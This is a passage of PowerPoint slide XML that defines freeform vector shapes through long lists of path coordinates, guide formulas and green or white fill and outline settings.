                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="53"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36117" name="Freeform 250"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3069" y="1374"/>
                <a:ext cx="168" cy="380"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 123 w 168"/>
                  <a:gd name="T1" fmla="*/ 68 h 380"/>
                  <a:gd name="T2" fmla="*/ 134 w 168"/>
                  <a:gd name="T3" fmla="*/ 86 h 380"/>
                  <a:gd name="T4" fmla="*/ 142 w 168"/>
                  <a:gd name="T5" fmla="*/ 109 h 380"/>
                  <a:gd name="T6" fmla="*/ 140 w 168"/>
                  <a:gd name="T7" fmla="*/ 154 h 380"/>
                  <a:gd name="T8" fmla="*/ 141 w 168"/>
                  <a:gd name="T9" fmla="*/ 190 h 380"/>
                  <a:gd name="T10" fmla="*/ 143 w 168"/>
                  <a:gd name="T11" fmla="*/ 212 h 380"/>
                  <a:gd name="T12" fmla="*/ 152 w 168"/>
                  <a:gd name="T13" fmla="*/ 243 h 380"/>
                  <a:gd name="T14" fmla="*/ 149 w 168"/>
                  <a:gd name="T15" fmla="*/ 258 h 380"/>
                  <a:gd name="T16" fmla="*/ 167 w 168"/>
                  <a:gd name="T17" fmla="*/ 277 h 380"/>
                  <a:gd name="T18" fmla="*/ 164 w 168"/>
                  <a:gd name="T19" fmla="*/ 297 h 380"/>
                  <a:gd name="T20" fmla="*/ 136 w 168"/>
                  <a:gd name="T21" fmla="*/ 334 h 380"/>
                  <a:gd name="T22" fmla="*/ 114 w 168"/>
                  <a:gd name="T23" fmla="*/ 358 h 380"/>
                  <a:gd name="T24" fmla="*/ 101 w 168"/>
                  <a:gd name="T25" fmla="*/ 360 h 380"/>
                  <a:gd name="T26" fmla="*/ 92 w 168"/>
                  <a:gd name="T27" fmla="*/ 363 h 380"/>
                  <a:gd name="T28" fmla="*/ 90 w 168"/>
                  <a:gd name="T29" fmla="*/ 364 h 380"/>
                  <a:gd name="T30" fmla="*/ 81 w 168"/>
                  <a:gd name="T31" fmla="*/ 367 h 380"/>
                  <a:gd name="T32" fmla="*/ 74 w 168"/>
                  <a:gd name="T33" fmla="*/ 370 h 380"/>
                  <a:gd name="T34" fmla="*/ 66 w 168"/>
                  <a:gd name="T35" fmla="*/ 372 h 380"/>
                  <a:gd name="T36" fmla="*/ 58 w 168"/>
                  <a:gd name="T37" fmla="*/ 379 h 380"/>
                  <a:gd name="T38" fmla="*/ 50 w 168"/>
                  <a:gd name="T39" fmla="*/ 377 h 380"/>
                  <a:gd name="T40" fmla="*/ 38 w 168"/>
                  <a:gd name="T41" fmla="*/ 380 h 380"/>
                  <a:gd name="T42" fmla="*/ 35 w 168"/>
                  <a:gd name="T43" fmla="*/ 368 h 380"/>
                  <a:gd name="T44" fmla="*/ 26 w 168"/>
                  <a:gd name="T45" fmla="*/ 365 h 380"/>
                  <a:gd name="T46" fmla="*/ 15 w 168"/>
                  <a:gd name="T47" fmla="*/ 361 h 380"/>
                  <a:gd name="T48" fmla="*/ 10 w 168"/>
                  <a:gd name="T49" fmla="*/ 342 h 380"/>
                  <a:gd name="T50" fmla="*/ 12 w 168"/>
                  <a:gd name="T51" fmla="*/ 326 h 380"/>
                  <a:gd name="T52" fmla="*/ 9 w 168"/>
                  <a:gd name="T53" fmla="*/ 303 h 380"/>
                  <a:gd name="T54" fmla="*/ 4 w 168"/>
                  <a:gd name="T55" fmla="*/ 293 h 380"/>
                  <a:gd name="T56" fmla="*/ 11 w 168"/>
                  <a:gd name="T57" fmla="*/ 279 h 380"/>
                  <a:gd name="T58" fmla="*/ 14 w 168"/>
                  <a:gd name="T59" fmla="*/ 268 h 380"/>
                  <a:gd name="T60" fmla="*/ 24 w 168"/>
                  <a:gd name="T61" fmla="*/ 268 h 380"/>
                  <a:gd name="T62" fmla="*/ 28 w 168"/>
                  <a:gd name="T63" fmla="*/ 249 h 380"/>
                  <a:gd name="T64" fmla="*/ 44 w 168"/>
                  <a:gd name="T65" fmla="*/ 236 h 380"/>
                  <a:gd name="T66" fmla="*/ 66 w 168"/>
                  <a:gd name="T67" fmla="*/ 209 h 380"/>
                  <a:gd name="T68" fmla="*/ 71 w 168"/>
                  <a:gd name="T69" fmla="*/ 202 h 380"/>
                  <a:gd name="T70" fmla="*/ 71 w 168"/>
                  <a:gd name="T71" fmla="*/ 187 h 380"/>
                  <a:gd name="T72" fmla="*/ 54 w 168"/>
                  <a:gd name="T73" fmla="*/ 172 h 380"/>
                  <a:gd name="T74" fmla="*/ 47 w 168"/>
                  <a:gd name="T75" fmla="*/ 163 h 380"/>
                  <a:gd name="T76" fmla="*/ 49 w 168"/>
                  <a:gd name="T77" fmla="*/ 132 h 380"/>
                  <a:gd name="T78" fmla="*/ 42 w 168"/>
                  <a:gd name="T79" fmla="*/ 98 h 380"/>
                  <a:gd name="T80" fmla="*/ 34 w 168"/>
                  <a:gd name="T81" fmla="*/ 75 h 380"/>
                  <a:gd name="T82" fmla="*/ 6 w 168"/>
                  <a:gd name="T83" fmla="*/ 53 h 380"/>
                  <a:gd name="T84" fmla="*/ 7 w 168"/>
                  <a:gd name="T85" fmla="*/ 30 h 380"/>
                  <a:gd name="T86" fmla="*/ 20 w 168"/>
                  <a:gd name="T87" fmla="*/ 42 h 380"/>
                  <a:gd name="T88" fmla="*/ 40 w 168"/>
                  <a:gd name="T89" fmla="*/ 57 h 380"/>
                  <a:gd name="T90" fmla="*/ 64 w 168"/>
                  <a:gd name="T91" fmla="*/ 65 h 380"/>
                  <a:gd name="T92" fmla="*/ 78 w 168"/>
                  <a:gd name="T93" fmla="*/ 39 h 380"/>
                  <a:gd name="T94" fmla="*/ 84 w 168"/>
                  <a:gd name="T95" fmla="*/ 11 h 380"/>
                  <a:gd name="T96" fmla="*/ 109 w 168"/>
                  <a:gd name="T97" fmla="*/ 0 h 380"/>
                  <a:gd name="T98" fmla="*/ 126 w 168"/>
                  <a:gd name="T99" fmla="*/ 11 h 380"/>
                  <a:gd name="T100" fmla="*/ 126 w 168"/>
                  <a:gd name="T101" fmla="*/ 42 h 380"/>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168"/>
                  <a:gd name="T154" fmla="*/ 0 h 380"/>
                  <a:gd name="T155" fmla="*/ 168 w 168"/>
                  <a:gd name="T156" fmla="*/ 380 h 380"/>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168" h="380">
                    <a:moveTo>
                      <a:pt x="125" y="53"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="125" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="53"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36118" name="Freeform 251"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1635" y="3100"/>
                <a:ext cx="190" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 190"/>
                  <a:gd name="T1" fmla="*/ 20 h 218"/>
                  <a:gd name="T2" fmla="*/ 26 w 190"/>
                  <a:gd name="T3" fmla="*/ 14 h 218"/>
                  <a:gd name="T4" fmla="*/ 43 w 190"/>
                  <a:gd name="T5" fmla="*/ 5 h 218"/>
                  <a:gd name="T6" fmla="*/ 59 w 190"/>
                  <a:gd name="T7" fmla="*/ 0 h 218"/>
                  <a:gd name="T8" fmla="*/ 67 w 190"/>
                  <a:gd name="T9" fmla="*/ 10 h 218"/>
                  <a:gd name="T10" fmla="*/ 68 w 190"/>
                  <a:gd name="T11" fmla="*/ 25 h 218"/>
                  <a:gd name="T12" fmla="*/ 84 w 190"/>
                  <a:gd name="T13" fmla="*/ 43 h 218"/>
                  <a:gd name="T14" fmla="*/ 95 w 190"/>
                  <a:gd name="T15" fmla="*/ 43 h 218"/>
                  <a:gd name="T16" fmla="*/ 110 w 190"/>
                  <a:gd name="T17" fmla="*/ 52 h 218"/>
                  <a:gd name="T18" fmla="*/ 119 w 190"/>
                  <a:gd name="T19" fmla="*/ 53 h 218"/>
                  <a:gd name="T20" fmla="*/ 126 w 190"/>
                  <a:gd name="T21" fmla="*/ 61 h 218"/>
                  <a:gd name="T22" fmla="*/ 143 w 190"/>
                  <a:gd name="T23" fmla="*/ 63 h 218"/>
                  <a:gd name="T24" fmla="*/ 146 w 190"/>
                  <a:gd name="T25" fmla="*/ 70 h 218"/>
                  <a:gd name="T26" fmla="*/ 149 w 190"/>
                  <a:gd name="T27" fmla="*/ 98 h 218"/>
                  <a:gd name="T28" fmla="*/ 158 w 190"/>
                  <a:gd name="T29" fmla="*/ 106 h 218"/>
                  <a:gd name="T30" fmla="*/ 178 w 190"/>
                  <a:gd name="T31" fmla="*/ 106 h 218"/>
                  <a:gd name="T32" fmla="*/ 177 w 190"/>
                  <a:gd name="T33" fmla="*/ 119 h 218"/>
                  <a:gd name="T34" fmla="*/ 188 w 190"/>
                  <a:gd name="T35" fmla="*/ 128 h 218"/>
                  <a:gd name="T36" fmla="*/ 189 w 190"/>
                  <a:gd name="T37" fmla="*/ 147 h 218"/>
                  <a:gd name="T38" fmla="*/ 182 w 190"/>
                  <a:gd name="T39" fmla="*/ 164 h 218"/>
                  <a:gd name="T40" fmla="*/ 165 w 190"/>
                  <a:gd name="T41" fmla="*/ 155 h 218"/>
                  <a:gd name="T42" fmla="*/ 151 w 190"/>
                  <a:gd name="T43" fmla="*/ 156 h 218"/>
